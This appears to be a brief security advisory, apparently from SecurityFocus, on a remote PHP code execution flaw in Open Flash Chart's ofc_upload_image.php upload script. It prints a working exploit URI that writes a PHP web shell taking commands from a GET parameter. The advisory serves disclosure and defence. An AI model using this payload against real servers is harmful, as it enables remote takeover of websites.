Open Flash Chart 'ofc_upload_image.php' Remote PHP Code Execution Vulnerability

Attackers may exploit this issue through a browser.

The following example URI and exploit code are available:

http://www.example.com/libs/open-flash-chart/php-ofc-library/ofc_upload_image.php?name=shell.php&HTTP_RAW_POST_DATA=<?system($_GET['cmd']);?>


 

Privacy Statement
Copyright 2010, SecurityFocus